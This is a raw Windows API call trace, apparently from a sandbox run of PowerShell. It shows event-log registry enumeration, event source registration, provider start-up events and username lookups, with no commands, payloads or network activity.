	[0431.199] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1, lpName=0xfc760, lpcchName=0x26d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.199] CoTaskMemFree (pv=0xfc760) 
	[0431.199] CoTaskMemFree (pv=0x0) 
	[0431.199] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.199] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2, lpName=0xfc760, lpcchName=0x26d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.199] CoTaskMemFree (pv=0xfc760) 
	[0431.199] CoTaskMemFree (pv=0x0) 
	[0431.199] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.200] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x3, lpName=0xfc760, lpcchName=0x26d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.200] CoTaskMemFree (pv=0xfc760) 
	[0431.200] CoTaskMemFree (pv=0x0) 
	[0431.200] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.200] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x4, lpName=0xfc760, lpcchName=0x26d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.200] CoTaskMemFree (pv=0xfc760) 
	[0431.200] CoTaskMemFree (pv=0x0) 
	[0431.200] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.200] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x5, lpName=0xfc760, lpcchName=0x26d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.200] CoTaskMemFree (pv=0xfc760) 
	[0431.200] CoTaskMemFree (pv=0x0) 
	[0431.200] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.200] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x6, lpName=0xfc760, lpcchName=0x26d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.200] CoTaskMemFree (pv=0xfc760) 
	[0431.200] CoTaskMemFree (pv=0x0) 
	[0431.200] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.200] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x7, lpName=0xfc760, lpcchName=0x26d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.200] CoTaskMemFree (pv=0xfc760) 
	[0431.200] CoTaskMemFree (pv=0x0) 
	[0431.200] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.200] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x8, lpName=0xfc760, lpcchName=0x26d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.200] CoTaskMemFree (pv=0xfc760) 
	[0431.200] CoTaskMemFree (pv=0x0) 
	[0431.200] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x350) returned 0x0
	[0431.201] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x0) returned 0x2
	[0431.201] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x354) returned 0x0
	[0431.201] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x0) returned 0x2
	[0431.201] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x358) returned 0x0
	[0431.201] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x0) returned 0x2
	[0431.201] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x35c) returned 0x0
	[0431.201] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x0) returned 0x2
	[0431.201] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x360) returned 0x0
	[0431.202] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x0) returned 0x2
	[0431.202] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x364) returned 0x0
	[0431.202] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x0) returned 0x2
	[0431.202] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x368) returned 0x0
	[0431.202] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x0) returned 0x2
	[0431.202] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x36c) returned 0x0
	[0431.202] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x0) returned 0x2
	[0431.202] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x370) returned 0x0
	[0431.203] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x374) returned 0x0
	[0431.203] RegCloseKey (hKey=0x374) returned 0x0
	[0431.204] RegCloseKey (hKey=0x34c) returned 0x0
	[0431.204] RegCloseKey (hKey=0x370) returned 0x0
	[0431.205] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1c8 | out: phkResult=0x26d1c8*=0x370) returned 0x0
	[0431.205] RegQueryInfoKeyW (in: hKey=0x370, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d13c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d138, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d13c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d138*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.205] CoTaskMemFree (pv=0x0) 
	[0431.205] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.205] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x0, lpName=0xfc760, lpcchName=0x26d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.205] CoTaskMemFree (pv=0xfc760) 
	[0431.205] CoTaskMemFree (pv=0x0) 
	[0431.205] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.205] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x1, lpName=0xfc760, lpcchName=0x26d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.205] CoTaskMemFree (pv=0xfc760) 
	[0431.205] CoTaskMemFree (pv=0x0) 
	[0431.205] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.205] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x2, lpName=0xfc760, lpcchName=0x26d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.205] CoTaskMemFree (pv=0xfc760) 
	[0431.205] CoTaskMemFree (pv=0x0) 
	[0431.205] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.205] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x3, lpName=0xfc760, lpcchName=0x26d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.205] CoTaskMemFree (pv=0xfc760) 
	[0431.205] CoTaskMemFree (pv=0x0) 
	[0431.206] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.206] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x4, lpName=0xfc760, lpcchName=0x26d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.206] CoTaskMemFree (pv=0xfc760) 
	[0431.206] CoTaskMemFree (pv=0x0) 
	[0431.206] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.206] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x5, lpName=0xfc760, lpcchName=0x26d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.206] CoTaskMemFree (pv=0xfc760) 
	[0431.206] CoTaskMemFree (pv=0x0) 
	[0431.206] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.206] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x6, lpName=0xfc760, lpcchName=0x26d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.206] CoTaskMemFree (pv=0xfc760) 
	[0431.206] CoTaskMemFree (pv=0x0) 
	[0431.206] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.206] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x7, lpName=0xfc760, lpcchName=0x26d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.206] CoTaskMemFree (pv=0xfc760) 
	[0431.206] CoTaskMemFree (pv=0x0) 
	[0431.206] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.206] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x8, lpName=0xfc760, lpcchName=0x26d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.206] CoTaskMemFree (pv=0xfc760) 
	[0431.206] CoTaskMemFree (pv=0x0) 
	[0431.206] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x34c) returned 0x0
	[0431.206] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x0) returned 0x2
	[0431.207] RegOpenKeyExW (in: hKey=0x370, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x374) returned 0x0
	[0431.207] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x0) returned 0x2
	[0431.207] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x378) returned 0x0
	[0431.207] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x0) returned 0x2
	[0431.323] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x1c0) returned 0x0
	[0431.323] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x0) returned 0x2
	[0431.323] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x338) returned 0x0
	[0431.323] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x0) returned 0x2
	[0431.323] RegOpenKeyExW (in: hKey=0x370, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x33c) returned 0x0
	[0431.323] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x0) returned 0x2
	[0431.324] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x340) returned 0x0
	[0431.324] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x0) returned 0x2
	[0431.324] RegOpenKeyExW (in: hKey=0x370, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x374) returned 0x0
	[0431.324] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x0) returned 0x2
	[0431.324] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x350) returned 0x0
	[0431.324] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x354) returned 0x0
	[0431.324] RegCloseKey (hKey=0x354) returned 0x0
	[0431.324] RegCloseKey (hKey=0x370) returned 0x0
	[0431.325] RegCloseKey (hKey=0x350) returned 0x0
	[0431.326] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d198 | out: phkResult=0x26d198*=0x350) returned 0x0
	[0431.326] RegQueryInfoKeyW (in: hKey=0x350, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d10c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d108, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d10c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d108*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.326] CoTaskMemFree (pv=0x0) 
	[0431.326] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.326] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x0, lpName=0xfc760, lpcchName=0x26d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.326] CoTaskMemFree (pv=0xfc760) 
	[0431.326] CoTaskMemFree (pv=0x0) 
	[0431.326] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.326] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x1, lpName=0xfc760, lpcchName=0x26d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.326] CoTaskMemFree (pv=0xfc760) 
	[0431.326] CoTaskMemFree (pv=0x0) 
	[0431.326] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.326] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x2, lpName=0xfc760, lpcchName=0x26d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.326] CoTaskMemFree (pv=0xfc760) 
	[0431.326] CoTaskMemFree (pv=0x0) 
	[0431.326] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.326] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x3, lpName=0xfc760, lpcchName=0x26d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.326] CoTaskMemFree (pv=0xfc760) 
	[0431.326] CoTaskMemFree (pv=0x0) 
	[0431.326] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.327] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x4, lpName=0xfc760, lpcchName=0x26d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.327] CoTaskMemFree (pv=0xfc760) 
	[0431.327] CoTaskMemFree (pv=0x0) 
	[0431.327] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.327] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x5, lpName=0xfc760, lpcchName=0x26d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.327] CoTaskMemFree (pv=0xfc760) 
	[0431.327] CoTaskMemFree (pv=0x0) 
	[0431.327] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.327] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x6, lpName=0xfc760, lpcchName=0x26d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.327] CoTaskMemFree (pv=0xfc760) 
	[0431.327] CoTaskMemFree (pv=0x0) 
	[0431.327] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.327] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x7, lpName=0xfc760, lpcchName=0x26d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.327] CoTaskMemFree (pv=0xfc760) 
	[0431.327] CoTaskMemFree (pv=0x0) 
	[0431.327] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.327] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x8, lpName=0xfc760, lpcchName=0x26d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.327] CoTaskMemFree (pv=0xfc760) 
	[0431.327] CoTaskMemFree (pv=0x0) 
	[0431.327] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1f8 | out: phkResult=0x26d1f8*=0x370) returned 0x0
	[0431.327] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1f8 | out: phkResult=0x26d1f8*=0x0) returned 0x2
	[0431.328] RegOpenKeyExW (in: hKey=0x350, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1f8 | out: phkResult=0x26d1f8*=0x354) returned 0x0
	[0431.328] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1f8 | out: phkResult=0x26d1f8*=0x0) returned 0x2
	[0431.328] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1f8 | out: phkResult=0x26d1f8*=0x358) returned 0x0
	[0431.328] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1f8 | out: phkResult=0x26d1f8*=0x0) returned 0x2
	[0431.328] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1f8 | out: phkResult=0x26d1f8*=0x35c) returned 0x0
	[0431.328] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1f8 | out: phkResult=0x26d1f8*=0x0) returned 0x2
	[0431.328] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1f8 | out: phkResult=0x26d1f8*=0x360) returned 0x0
	[0431.328] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1f8 | out: phkResult=0x26d1f8*=0x0) returned 0x2
	[0431.328] RegOpenKeyExW (in: hKey=0x350, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1f8 | out: phkResult=0x26d1f8*=0x364) returned 0x0
	[0431.329] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1f8 | out: phkResult=0x26d1f8*=0x0) returned 0x2
	[0431.329] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1f8 | out: phkResult=0x26d1f8*=0x368) returned 0x0
	[0431.329] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1f8 | out: phkResult=0x26d1f8*=0x0) returned 0x2
	[0431.329] RegOpenKeyExW (in: hKey=0x350, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1f8 | out: phkResult=0x26d1f8*=0x36c) returned 0x0
	[0431.329] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1f8 | out: phkResult=0x26d1f8*=0x0) returned 0x2
	[0431.329] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1f8 | out: phkResult=0x26d1f8*=0x378) returned 0x0
	[0431.329] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1f8 | out: phkResult=0x26d1f8*=0x1c8) returned 0x0
	[0431.329] RegCloseKey (hKey=0x1c8) returned 0x0
	[0431.329] RegCloseKey (hKey=0x350) returned 0x0
	[0431.330] RegCloseKey (hKey=0x378) returned 0x0
	[0431.333] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1bb30008
	[0431.425] ReportEventW (hEventLog=0x1bb30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33ead58*="WSMan", lpRawData=0x33eaac8) returned 1
	[0431.425] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.425] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.425] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.426] CoTaskMemAlloc (cb=0x804) returned 0xf05a0
	[0431.426] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xf05a0, nSize=0x26d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d488) returned 0x1
	[0431.426] CoTaskMemFree (pv=0xf05a0) 
	[0431.426] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.426] GetUserNameW (in: lpBuffer=0xfc760, pcbBuffer=0x26d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d4c8) returned 1
	[0431.427] CoTaskMemFree (pv=0xfc760) 
	[0431.427] ReportEventW (hEventLog=0x1bb30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33f0738*="Alias", lpRawData=0x33f04c8) returned 1
	[0431.427] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.427] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.427] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.428] CoTaskMemAlloc (cb=0x804) returned 0xf05a0
	[0431.428] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xf05a0, nSize=0x26d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d488) returned 0x1
	[0431.428] CoTaskMemFree (pv=0xf05a0) 
	[0431.428] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.428] GetUserNameW (in: lpBuffer=0xfc760, pcbBuffer=0x26d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d4c8) returned 1
	[0431.428] CoTaskMemFree (pv=0xfc760) 
	[0431.429] ReportEventW (hEventLog=0x1bb30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33f5d30*="Environment", lpRawData=0x33f5ac0) returned 1
	[0431.429] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
